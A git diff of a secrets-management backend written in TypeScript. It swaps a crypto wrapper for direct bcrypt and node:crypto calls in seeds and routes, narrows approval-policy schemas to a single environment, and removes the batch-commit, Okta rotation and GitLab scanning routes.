@@ -1,9 +1,5 @@
 import { Knex } from "knex";
 
-import { crypto } from "@app/lib/crypto";
-import { initLogger } from "@app/lib/logger";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
-
 import { AuthMethod } from "../../services/auth/auth-type";
 import { TableName } from "../schemas";
 import { generateUserSrpKeys, seedData1 } from "../seed-data";
@@ -14,11 +10,6 @@ export async function seed(knex: Knex): Promise<void> {
   await knex(TableName.UserEncryptionKey).del();
   await knex(TableName.SuperAdmin).del();
 
-  initLogger();
-
-  const superAdminDAL = superAdminDALFactory(knex);
-  await crypto.initialize(superAdminDAL);
-
   await knex(TableName.SuperAdmin).insert([
     // eslint-disable-next-line
     // @ts-ignore

backend/src/db/seeds/3-project.ts

@@ -1,6 +1,8 @@
+import crypto from "node:crypto";
+
 import { Knex } from "knex";
 
-import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
+import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
 
 import { ProjectMembershipRole, ProjectType, SecretEncryptionAlgo, SecretKeyEncoding, TableName } from "../schemas";
 import { buildUserProjectKey, getUserPrivateKey, seedData1 } from "../seed-data";
@@ -70,11 +72,7 @@ export async function seed(knex: Knex): Promise<void> {
   const encKey = process.env.ENCRYPTION_KEY;
   if (!encKey) throw new Error("Missing ENCRYPTION_KEY");
   const salt = crypto.randomBytes(16).toString("base64");
-  const secretBlindIndex = crypto.encryption().symmetric().encrypt({
-    plaintext: salt,
-    key: encKey,
-    keySize: SymmetricKeySize.Bits128
-  });
+  const secretBlindIndex = encryptSymmetric128BitHexKeyUTF8(salt, encKey);
   // insert secret blind index for project
   await knex(TableName.SecretBlindIndex).insert({
     projectId: project.id,

backend/src/db/seeds/5-machine-identity.ts

@@ -1,7 +1,6 @@
+import bcrypt from "bcrypt";
 import { Knex } from "knex";
 
-import { crypto } from "@app/lib/crypto/cryptography";
-
 import { IdentityAuthMethod, OrgMembershipRole, ProjectMembershipRole, TableName } from "../schemas";
 import { seedData1 } from "../seed-data";
 
@@ -55,9 +54,7 @@ export async function seed(knex: Knex): Promise<void> {
       }
     ])
     .returning("*");
-
-  const clientSecretHash = await crypto.hashing().createHash(seedData1.machineIdentity.clientCredentials.secret, 10);
-
+  const clientSecretHash = await bcrypt.hash(seedData1.machineIdentity.clientCredentials.secret, 10);
   await knex(TableName.IdentityUaClientSecret).insert([
     {
       identityUAId: identityUa[0].id,

backend/src/ee/routes/est/certificate-est-router.ts

@@ -1,7 +1,7 @@
+import bcrypt from "bcrypt";
 import { z } from "zod";
 
 import { getConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 
@@ -85,7 +85,7 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) =
       });
     }
 
-    const isPasswordValid = await crypto.hashing().compareHash(password, estConfig.hashedPassphrase);
+    const isPasswordValid = await bcrypt.compare(password, estConfig.hashedPassphrase);
     if (!isPasswordValid) {
       throw new UnauthorizedError({
         message: "Invalid credentials"

backend/src/ee/routes/v1/access-approval-policy-router.ts

@@ -2,7 +2,6 @@ import { nanoid } from "nanoid";
 import { z } from "zod";
 
 import { ApproverType, BypasserType } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
-import { removeTrailingSlash } from "@app/lib/fn";
 import { EnforcementLevel } from "@app/lib/types";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@@ -17,66 +16,52 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
       rateLimit: writeLimit
     },
     schema: {
-      body: z
-        .object({
-          projectSlug: z.string().trim(),
-          name: z.string().optional(),
-          secretPath: z
-            .string()
-            .trim()
-            .min(1, { message: "Secret path cannot be empty" })
-            .transform(removeTrailingSlash),
-          environment: z.string().optional(),
-          environments: z.string().array().optional(),
-          approvers: z
-            .discriminatedUnion("type", [
-              z.object({
-                type: z.literal(ApproverType.Group),
-                id: z.string(),
-                sequence: z.number().int().default(1)
-              }),
-              z.object({
-                type: z.literal(ApproverType.User),
-                id: z.string().optional(),
-                username: z.string().optional(),
-                sequence: z.number().int().default(1)
-              })
-            ])
-            .array()
-            .max(100, "Cannot have more than 100 approvers")
-            .min(1, { message: "At least one approver should be provided" })
-            .refine(
-              // @ts-expect-error this is ok
-              (el) => el.every((i) => Boolean(i?.id) || Boolean(i?.username)),
-              "Must provide either username or id"
-            ),
-          bypassers: z
-            .discriminatedUnion("type", [
-              z.object({ type: z.literal(BypasserType.Group), id: z.string() }),
-              z.object({
-                type: z.literal(BypasserType.User),
-                id: z.string().optional(),
-                username: z.string().optional()
-              })
-            ])
-            .array()
-            .max(100, "Cannot have more than 100 bypassers")
-            .optional(),
-          approvalsRequired: z
-            .object({
-              numberOfApprovals: z.number().int(),
-              stepNumber: z.number().int()
+      body: z.object({
+        projectSlug: z.string().trim(),
+        name: z.string().optional(),
+        secretPath: z.string().trim().default("/"),
+        environment: z.string(),
+        approvers: z
+          .discriminatedUnion("type", [
+            z.object({
+              type: z.literal(ApproverType.Group),
+              id: z.string(),
+              sequence: z.number().int().default(1)
+            }),
+            z.object({
+              type: z.literal(ApproverType.User),
+              id: z.string().optional(),
+              username: z.string().optional(),
+              sequence: z.number().int().default(1)
             })
-            .array()
-            .optional(),
-          approvals: z.number().min(1).default(1),
-          enforcementLevel: z.nativeEnum(EnforcementLevel).default(EnforcementLevel.Hard),
-          allowedSelfApprovals: z.boolean().default(true)
-        })
-        .refine(
-          (val) => Boolean(val.environment) || Boolean(val.environments),
-          "Must provide either environment or environments"
-        ),
+          ])
+          .array()
+          .max(100, "Cannot have more than 100 approvers")
+          .min(1, { message: "At least one approver should be provided" })
+          .refine(
+            // @ts-expect-error this is ok
+            (el) => el.every((i) => Boolean(i?.id) || Boolean(i?.username)),
+            "Must provide either username or id"
+          ),
+        bypassers: z
+          .discriminatedUnion("type", [
+            z.object({ type: z.literal(BypasserType.Group), id: z.string() }),
+            z.object({ type: z.literal(BypasserType.User), id: z.string().optional(), username: z.string().optional() })
+          ])
+          .array()
+          .max(100, "Cannot have more than 100 bypassers")
+          .optional(),
+        approvalsRequired: z
+          .object({
+            numberOfApprovals: z.number().int(),
+            stepNumber: z.number().int()
+          })
+          .array()
+          .optional(),
+        approvals: z.number().min(1).default(1),
+        enforcementLevel: z.nativeEnum(EnforcementLevel).default(EnforcementLevel.Hard),
+        allowedSelfApprovals: z.boolean().default(true)
+      }),
       response: {
         200: z.object({
           approval: sapPubSchema
@@ -92,8 +77,7 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
         actorOrgId: req.permission.orgId,
         ...req.body,
         projectSlug: req.body.projectSlug,
-        name:
-          req.body.name ?? `${req.body.environment || req.body.environments?.join("-").substring(0, 250)}-${nanoid(3)}`,
+        name: req.body.name ?? `${req.body.environment}-${nanoid(3)}`,
         enforcementLevel: req.body.enforcementLevel
       });
       return { approval };
@@ -190,9 +174,8 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
         secretPath: z
           .string()
           .trim()
-          .min(1, { message: "Secret path cannot be empty" })
           .optional()
-          .transform((val) => (val ? removeTrailingSlash(val) : val)),
+          .transform((val) => (val === "" ? "/" : val)),
         approvers: z
           .discriminatedUnion("type", [
             z.object({
@@ -226,7 +209,6 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
         approvals: z.number().min(1).optional(),
         enforcementLevel: z.nativeEnum(EnforcementLevel).default(EnforcementLevel.Hard),
         allowedSelfApprovals: z.boolean().default(true),
-        environments: z.array(z.string()).optional(),
         approvalsRequired: z
           .object({
             numberOfApprovals: z.number().int(),

backend/src/ee/routes/v1/pit-router.ts

@@ -3,14 +3,11 @@ import { z } from "zod";
 
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { removeTrailingSlash } from "@app/lib/fn";
-import { isValidFolderName } from "@app/lib/validator";
-import { readLimit, secretsLimit } from "@app/server/config/rateLimiter";
-import { SecretNameSchema } from "@app/server/lib/schemas";
+import { readLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
 import { booleanSchema } from "@app/server/routes/sanitizedSchemas";
 import { AuthMode } from "@app/services/auth/auth-type";
 import { commitChangesResponseSchema, resourceChangeSchema } from "@app/services/folder-commit/folder-commit-schemas";
-import { ResourceMetadataSchema } from "@app/services/resource-metadata/resource-metadata-schema";
 
 const commitHistoryItemSchema = z.object({
   id: z.string(),
@@ -416,166 +413,4 @@ export const registerPITRouter = async (server: FastifyZodProvider) => {
       return result;
     }
   });
-
-  server.route({
-    method: "POST",
-    url: "/batch/commit",
-    config: {
-      rateLimit: secretsLimit
-    },
-    schema: {
-      hide: true,
-      description: "Commit changes",
-      security: [
-        {
-          bearerAuth: []
-        }
-      ],
-      body: z.object({
-        projectId: z.string().trim(),
-        environment: z.string().trim(),
-        secretPath: z.string().trim().default("/").transform(removeTrailingSlash),
-        message: z
-          .string()
-          .trim()
-          .min(1)
-          .max(255)
-          .refine((message) => message.trim() !== "", {
-            message: "Commit message cannot be empty"
-          }),
-        changes: z.object({
-          secrets: z.object({
-            create: z
-              .array(
-                z.object({
-                  secretKey: SecretNameSchema,
-                  secretValue: z.string().transform((val) => (val.at(-1) === "\n" ? `${val.trim()}\n` : val.trim())),
-                  secretComment: z.string().trim().optional().default(""),
-                  skipMultilineEncoding: z.boolean().optional(),
-                  metadata: z.record(z.string()).optional(),
-                  secretMetadata: ResourceMetadataSchema.optional(),
-                  tagIds: z.string().array().optional()
-                })
-              )
-              .optional(),
-            update: z
-              .array(
-                z.object({
-                  secretKey: SecretNameSchema,
-                  newSecretName: SecretNameSchema.optional(),
-                  secretValue: z
-                    .string()
-                    .transform((val) => (val.at(-1) === "\n" ? `${val.trim()}\n` : val.trim()))
-                    .optional(),
-                  secretComment: z.string().trim().optional().default(""),
-                  skipMultilineEncoding: z.boolean().optional(),
-                  metadata: z.record(z.string()).optional(),
-                  secretMetadata: ResourceMetadataSchema.optional(),
-                  tagIds: z.string().array().optional()
-                })
-              )
-              .optional(),
-            delete: z
-              .array(
-                z.object({
-                  secretKey: SecretNameSchema
-                })
-              )
-              .optional()
-          }),
-          folders: z.object({
-            create: z
-              .array(
-                z.object({
-                  folderName: z
-                    .string()
-                    .trim()
-                    .refine((name) => isValidFolderName(name), {
-                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
-                    }),
-                  description: z.string().optional()
-                })
-              )
-              .optional(),
-            update: z
-              .array(
-                z.object({
-                  folderName: z
-                    .string()
-                    .trim()
-                    .refine((name) => isValidFolderName(name), {
-                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
-                    }),
-                  description: z.string().nullable().optional(),
-                  id: z.string()
-                })
-              )
-              .optional(),
-            delete: z
-              .array(
-                z.object({
-                  folderName: z
-                    .string()
-                    .trim()
-                    .refine((name) => isValidFolderName(name), {
-                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
-                    }),
-                  id: z.string()
-                })
-              )
-              .optional()
-          })
-        })
-      }),
-      response: {
-        200: z.object({
-          message: z.string()
-        })
-      }
-    },
-    onRequest: verifyAuth([AuthMode.JWT]),
-    handler: async (req) => {
-      const result = await server.services.pit.processNewCommitRaw({
-        actorId: req.permission.id,
-        actor: req.permission.type,
-        actorOrgId: req.permission.orgId,
-        actorAuthMethod: req.permission.authMethod,
-        projectId: req.body.projectId,
-        environment: req.body.environment,
-        secretPath: req.body.secretPath,
-        message: req.body.message,
-        changes: {
-          secrets: req.body.changes.secrets,
-          folders: req.body.changes.folders
-        }
-      });
-
-      await server.services.auditLog.createAuditLog({
-        ...req.auditLogInfo,
-        projectId: req.body.projectId,
-        event: {
-          type: EventType.PIT_PROCESS_NEW_COMMIT_RAW,
-          metadata: {
-            commitId: result.commitId,
-            approvalId: result.approvalId,
-            projectId: req.body.projectId,
-            environment: req.body.environment,
-            secretPath: req.body.secretPath,
-            message: req.body.message
-          }
-        }
-      });
-
-      for await (const event of result.secretMutationEvents) {
-        await server.services.auditLog.createAuditLog({
-          ...req.auditLogInfo,
-          orgId: req.permission.orgId,
-          projectId: req.body.projectId,
-          event
-        });
-      }
-
-      return { message: "success" };
-    }
-  });
 };

backend/src/ee/routes/v1/project-template-router.ts

@@ -1,6 +1,6 @@
 import { z } from "zod";
 
-import { ProjectMembershipRole, ProjectTemplatesSchema, ProjectType } from "@app/db/schemas";
+import { ProjectMembershipRole, ProjectTemplatesSchema } from "@app/db/schemas";
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { ProjectPermissionV2Schema } from "@app/ee/services/permission/project-permission";
 import { isInfisicalProjectTemplate } from "@app/ee/services/project-template/project-template-fns";
@@ -104,9 +104,6 @@ export const registerProjectTemplateRouter = async (server: FastifyZodProvider)
       hide: false,
       tags: [ApiDocsTags.ProjectTemplates],
       description: "List project templates for the current organization.",
-      querystring: z.object({
-        type: z.nativeEnum(ProjectType).optional().describe(ProjectTemplates.LIST.type)
-      }),
       response: {
         200: z.object({
           projectTemplates: SanitizedProjectTemplateSchema.array()
@@ -115,10 +112,7 @@ export const registerProjectTemplateRouter = async (server: FastifyZodProvider)
     },
     onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]),
     handler: async (req) => {
-      const projectTemplates = await server.services.projectTemplate.listProjectTemplatesByOrg(
-        req.permission,
-        req.query.type
-      );
+      const projectTemplates = await server.services.projectTemplate.listProjectTemplatesByOrg(req.permission);
 
       const auditTemplates = projectTemplates.filter((template) => !isInfisicalProjectTemplate(template.name));
 
@@ -197,7 +191,6 @@ export const registerProjectTemplateRouter = async (server: FastifyZodProvider)
           .describe(ProjectTemplates.CREATE.name),
         description: z.string().max(256).trim().optional().describe(ProjectTemplates.CREATE.description),
         roles: ProjectTemplateRolesSchema.default([]).describe(ProjectTemplates.CREATE.roles),
-        type: z.nativeEnum(ProjectType).describe(ProjectTemplates.CREATE.type),
         environments: ProjectTemplateEnvironmentsSchema.describe(ProjectTemplates.CREATE.environments).optional()
       }),
       response: {

backend/src/ee/routes/v1/secret-approval-policy-router.ts

@@ -17,45 +17,36 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
       rateLimit: writeLimit
     },
     schema: {
-      body: z
-        .object({
-          workspaceId: z.string(),
-          name: z.string().optional(),
-          environment: z.string().optional(),
-          environments: z.string().array().optional(),
-          secretPath: z
-            .string()
-            .min(1, { message: "Secret path cannot be empty" })
-            .transform((val) => removeTrailingSlash(val)),
-          approvers: z
-            .discriminatedUnion("type", [
-              z.object({ type: z.literal(ApproverType.Group), id: z.string() }),
-              z.object({
-                type: z.literal(ApproverType.User),
-                id: z.string().optional(),
-                username: z.string().optional()
-              })
-            ])
-            .array()
-            .min(1, { message: "At least one approver should be provided" })
-            .max(100, "Cannot have more than 100 approvers"),
-          bypassers: z
-            .discriminatedUnion("type", [
-              z.object({ type: z.literal(BypasserType.Group), id: z.string() }),
-              z.object({
-                type: z.literal(BypasserType.User),
-                id: z.string().optional(),
-                username: z.string().optional()
-              })
-            ])
-            .array()
-            .max(100, "Cannot have more than 100 bypassers")
-            .optional(),
-          approvals: z.number().min(1).default(1),
-          enforcementLevel: z.nativeEnum(EnforcementLevel).default(EnforcementLevel.Hard),
-          allowedSelfApprovals: z.boolean().default(true)
-        })
-        .refine((data) => data.environment || data.environments, "At least one environment should be provided"),
+      body: z.object({
+        workspaceId: z.string(),
+        name: z.string().optional(),
+        environment: z.string(),
+        secretPath: z
+          .string()
+          .optional()
+          .nullable()
+          .default("/")
+          .transform((val) => (val ? removeTrailingSlash(val) : val)),
+        approvers: z
+          .discriminatedUnion("type", [
+            z.object({ type: z.literal(ApproverType.Group), id: z.string() }),
+            z.object({ type: z.literal(ApproverType.User), id: z.string().optional(), username: z.string().optional() })
+          ])
+          .array()
+          .min(1, { message: "At least one approver should be provided" })
+          .max(100, "Cannot have more than 100 approvers"),
+        bypassers: z
+          .discriminatedUnion("type", [
+            z.object({ type: z.literal(BypasserType.Group), id: z.string() }),
+            z.object({ type: z.literal(BypasserType.User), id: z.string().optional(), username: z.string().optional() })
+          ])
+          .array()
+          .max(100, "Cannot have more than 100 bypassers")
+          .optional(),
+        approvals: z.number().min(1).default(1),
+        enforcementLevel: z.nativeEnum(EnforcementLevel).default(EnforcementLevel.Hard),
+        allowedSelfApprovals: z.boolean().default(true)
+      }),
       response: {
         200: z.object({
           approval: sapPubSchema
@@ -71,7 +62,7 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
         actorOrgId: req.permission.orgId,
         projectId: req.body.workspaceId,
         ...req.body,
-        name: req.body.name ?? `${req.body.environment || req.body.environments?.join(",")}-${nanoid(3)}`,
+        name: req.body.name ?? `${req.body.environment}-${nanoid(3)}`,
         enforcementLevel: req.body.enforcementLevel
       });
       return { approval };
@@ -109,13 +100,12 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
         approvals: z.number().min(1).default(1),
         secretPath: z
           .string()
-          .trim()
-          .min(1, { message: "Secret path cannot be empty" })
           .optional()
-          .transform((val) => (val ? removeTrailingSlash(val) : undefined)),
+          .nullable()
+          .transform((val) => (val ? removeTrailingSlash(val) : val))
+          .transform((val) => (val === "" ? "/" : val)),
         enforcementLevel: z.nativeEnum(EnforcementLevel).optional(),
-        allowedSelfApprovals: z.boolean().default(true),
-        environments: z.array(z.string()).optional()
+        allowedSelfApprovals: z.boolean().default(true)
       }),
       response: {
         200: z.object({

backend/src/ee/routes/v1/secret-approval-request-router.ts

@@ -58,7 +58,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
               deletedAt: z.date().nullish(),
               allowedSelfApprovals: z.boolean()
             }),
-            committerUser: approvalRequestUser.nullish(),
+            committerUser: approvalRequestUser,
             commits: z.object({ op: z.string(), secretId: z.string().nullable().optional() }).array(),
             environment: z.string(),
             reviewers: z.object({ userId: z.string(), status: z.string() }).array(),
@@ -308,7 +308,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
               }),
               environment: z.string(),
               statusChangedByUser: approvalRequestUser.optional(),
-              committerUser: approvalRequestUser.nullish(),
+              committerUser: approvalRequestUser,
               reviewers: approvalRequestUser.extend({ status: z.string(), comment: z.string().optional() }).array(),
               secretPath: z.string(),
               commits: secretRawSchema

backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts

@@ -6,7 +6,6 @@ import { registerAzureClientSecretRotationRouter } from "./azure-client-secret-r
 import { registerLdapPasswordRotationRouter } from "./ldap-password-rotation-router";
 import { registerMsSqlCredentialsRotationRouter } from "./mssql-credentials-rotation-router";
 import { registerMySqlCredentialsRotationRouter } from "./mysql-credentials-rotation-router";
-import { registerOktaClientSecretRotationRouter } from "./okta-client-secret-rotation-router";
 import { registerOracleDBCredentialsRotationRouter } from "./oracledb-credentials-rotation-router";
 import { registerPostgresCredentialsRotationRouter } from "./postgres-credentials-rotation-router";
 
@@ -23,6 +22,5 @@ export const SECRET_ROTATION_REGISTER_ROUTER_MAP: Record<
   [SecretRotation.Auth0ClientSecret]: registerAuth0ClientSecretRotationRouter,
   [SecretRotation.AzureClientSecret]: registerAzureClientSecretRotationRouter,
   [SecretRotation.AwsIamUserSecret]: registerAwsIamUserSecretRotationRouter,
-  [SecretRotation.LdapPassword]: registerLdapPasswordRotationRouter,
-  [SecretRotation.OktaClientSecret]: registerOktaClientSecretRotationRouter
+  [SecretRotation.LdapPassword]: registerLdapPasswordRotationRouter
 };

backend/src/ee/routes/v2/secret-rotation-v2-routers/okta-client-secret-rotation-router.ts

@@ -1,19 +0,0 @@
-import {
-  CreateOktaClientSecretRotationSchema,
-  OktaClientSecretRotationGeneratedCredentialsSchema,
-  OktaClientSecretRotationSchema,
-  UpdateOktaClientSecretRotationSchema
-} from "@app/ee/services/secret-rotation-v2/okta-client-secret";
-import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums";
-
-import { registerSecretRotationEndpoints } from "./secret-rotation-v2-endpoints";
-
-export const registerOktaClientSecretRotationRouter = async (server: FastifyZodProvider) =>
-  registerSecretRotationEndpoints({
-    type: SecretRotation.OktaClientSecret,
-    server,
-    responseSchema: OktaClientSecretRotationSchema,
-    createSchema: CreateOktaClientSecretRotationSchema,
-    updateSchema: UpdateOktaClientSecretRotationSchema,
-    generatedCredentialsSchema: OktaClientSecretRotationGeneratedCredentialsSchema
-  });

backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts

@@ -315,12 +315,10 @@ export const registerSecretRotationEndpoints = <
       querystring: z.object({
         deleteSecrets: z
           .enum(["true", "false"])
-          .optional()
           .transform((value) => value === "true")
           .describe(SecretRotations.DELETE(type).deleteSecrets),
         revokeGeneratedCredentials: z
           .enum(["true", "false"])
-          .optional()
           .transform((value) => value === "true")
           .describe(SecretRotations.DELETE(type).revokeGeneratedCredentials)
       }),

backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts

@@ -7,7 +7,6 @@ import { AzureClientSecretRotationListItemSchema } from "@app/ee/services/secret
 import { LdapPasswordRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/ldap-password";
 import { MsSqlCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/mssql-credentials";
 import { MySqlCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/mysql-credentials";
-import { OktaClientSecretRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/okta-client-secret";
 import { OracleDBCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/oracledb-credentials";
 import { PostgresCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/postgres-credentials";
 import { SecretRotationV2Schema } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema";
@@ -24,8 +23,7 @@ const SecretRotationV2OptionsSchema = z.discriminatedUnion("type", [
   Auth0ClientSecretRotationListItemSchema,
   AzureClientSecretRotationListItemSchema,
   AwsIamUserSecretRotationListItemSchema,
-  LdapPasswordRotationListItemSchema,
-  OktaClientSecretRotationListItemSchema
+  LdapPasswordRotationListItemSchema
 ]);
 
 export const registerSecretRotationV2Router = async (server: FastifyZodProvider) => {

backend/src/ee/routes/v2/secret-scanning-v2-routers/gitlab-secret-scanning-router.ts

@@ -1,16 +0,0 @@
-import { registerSecretScanningEndpoints } from "@app/ee/routes/v2/secret-scanning-v2-routers/secret-scanning-v2-endpoints";
-import {
-  CreateGitLabDataSourceSchema,
-  GitLabDataSourceSchema,
-  UpdateGitLabDataSourceSchema
-} from "@app/ee/services/secret-scanning-v2/gitlab";
-import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
-
-export const registerGitLabSecretScanningRouter = async (server: FastifyZodProvider) =>
-  registerSecretScanningEndpoints({
-    type: SecretScanningDataSource.GitLab,
-    server,
-    responseSchema: GitLabDataSourceSchema,
-    createSchema: CreateGitLabDataSourceSchema,
-    updateSchema: UpdateGitLabDataSourceSchema
-  });

backend/src/ee/routes/v2/secret-scanning-v2-routers/index.ts

@@ -1,4 +1,3 @@
-import { registerGitLabSecretScanningRouter } from "@app/ee/routes/v2/secret-scanning-v2-routers/gitlab-secret-scanning-router";
 import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
 
 import { registerBitbucketSecretScanningRouter } from "./bitbucket-secret-scanning-router";
@@ -11,6 +10,5 @@ export const SECRET_SCANNING_REGISTER_ROUTER_MAP: Record<
   (server: FastifyZodProvider) => Promise<void>
 > = {
   [SecretScanningDataSource.GitHub]: registerGitHubSecretScanningRouter,
-  [SecretScanningDataSource.Bitbucket]: registerBitbucketSecretScanningRouter,
-  [SecretScanningDataSource.GitLab]: registerGitLabSecretScanningRouter
+  [SecretScanningDataSource.Bitbucket]: registerBitbucketSecretScanningRouter
 };

backend/src/ee/routes/v2/secret-scanning-v2-routers/secret-scanning-v2-router.ts

@@ -4,7 +4,6 @@ import { SecretScanningConfigsSchema } from "@app/db/schemas";
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { BitbucketDataSourceListItemSchema } from "@app/ee/services/secret-scanning-v2/bitbucket";
 import { GitHubDataSourceListItemSchema } from "@app/ee/services/secret-scanning-v2/github";
-import { GitLabDataSourceListItemSchema } from "@app/ee/services/secret-scanning-v2/gitlab";
 import {
   SecretScanningFindingStatus,
   SecretScanningScanStatus
@@ -25,8 +24,7 @@ import { AuthMode } from "@app/services/auth/auth-type";
 
 const SecretScanningDataSourceOptionsSchema = z.discriminatedUnion("type", [
   GitHubDataSourceListItemSchema,
-  BitbucketDataSourceListItemSchema,
-  GitLabDataSourceListItemSchema
+  BitbucketDataSourceListItemSchema
 ]);
 
 export const registerSecretScanningV2Router = async (server: FastifyZodProvider) => {

backend/src/ee/services/access-approval-policy/access-approval-policy-dal.ts

@@ -26,7 +26,6 @@ export interface TAccessApprovalPolicyDALFactory
     >,
     customFilter?: {
       policyId?: string;
-      envId?: string;
     },
     tx?: Knex
   ) => Promise<
@@ -54,8 +53,13 @@ export interface TAccessApprovalPolicyDALFactory
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath: string;
+      secretPath?: string | null | undefined;
       deletedAt?: Date | null | undefined;
+      environment: {
+        id: string;
+        name: string;
+        slug: string;
+      };
       projectId: string;
       bypassers: (
         | {
@@ -68,11 +72,6 @@ export interface TAccessApprovalPolicyDALFactory
             type: BypasserType.Group;
           }
       )[];
-      environments: {
-        id: string;
-        name: string;
-        slug: string;
-      }[];
     }[]
   >;
   findById: (
@@ -94,13 +93,13 @@ export interface TAccessApprovalPolicyDALFactory
         envId: string;
         enforcementLevel: string;
         allowedSelfApprovals: boolean;
-        secretPath: string;
+        secretPath?: string | null | undefined;
         deletedAt?: Date | null | undefined;
-        environments: {
+        environment: {
           id: string;
           name: string;
           slug: string;
-        }[];
+        };
         projectId: string;
       }
     | undefined
@@ -117,7 +116,7 @@ export interface TAccessApprovalPolicyDALFactory
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
   }>;
   findLastValidPolicy: (
@@ -139,31 +138,11 @@ export interface TAccessApprovalPolicyDALFactory
         envId: string;
         enforcementLevel: string;
         allowedSelfApprovals: boolean;
-        secretPath: string;
+        secretPath?: string | null | undefined;
         deletedAt?: Date | null | undefined;
       }
     | undefined
   >;
-  findPolicyByEnvIdAndSecretPath: (
-    { envIds, secretPath }: { envIds: string[]; secretPath: string },
-    tx?: Knex
-  ) => Promise<{
-    name: string;
-    id: string;
-    createdAt: Date;
-    updatedAt: Date;
-    approvals: number;
-    enforcementLevel: string;
-    allowedSelfApprovals: boolean;
-    secretPath: string;
-    deletedAt?: Date | null | undefined;
-    environments: {
-      id: string;
-      name: string;
-      slug: string;
-    }[];
-    projectId: string;
-  }>;
 }
 
 export interface TAccessApprovalPolicyServiceFactory {
@@ -211,7 +190,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
   }>;
   deleteAccessApprovalPolicy: ({
@@ -235,7 +214,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
@@ -273,7 +252,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
   }>;
   getAccessApprovalPolicyByProjectSlug: ({
@@ -307,7 +286,7 @@ export interface TAccessApprovalPolicyServiceFactory {
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath: string;
+      secretPath?: string | null | undefined;
       deletedAt?: Date | null | undefined;
       environment: {
         id: string;
@@ -358,7 +337,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
@@ -388,7 +367,6 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
     filter: TFindFilter<TAccessApprovalPolicies & { projectId: string }>,
     customFilter?: {
       policyId?: string;
-      envId?: string;
     }
   ) => {
     const result = await tx(TableName.AccessApprovalPolicy)
@@ -399,17 +377,7 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
           void qb.where(`${TableName.AccessApprovalPolicy}.id`, "=", customFilter.policyId);
         }
       })
-      .join(
-        TableName.AccessApprovalPolicyEnvironment,
-        `${TableName.AccessApprovalPolicy}.id`,
-        `${TableName.AccessApprovalPolicyEnvironment}.policyId`
-      )
-      .join(TableName.Environment, `${TableName.AccessApprovalPolicyEnvironment}.envId`, `${TableName.Environment}.id`)
-      .where((qb) => {
-        if (customFilter?.envId) {
-          void qb.where(`${TableName.AccessApprovalPolicyEnvironment}.envId`, "=", customFilter.envId);
-        }
-      })
+      .join(TableName.Environment, `${TableName.AccessApprovalPolicy}.envId`, `${TableName.Environment}.id`)
       .leftJoin(
         TableName.AccessApprovalPolicyApprover,
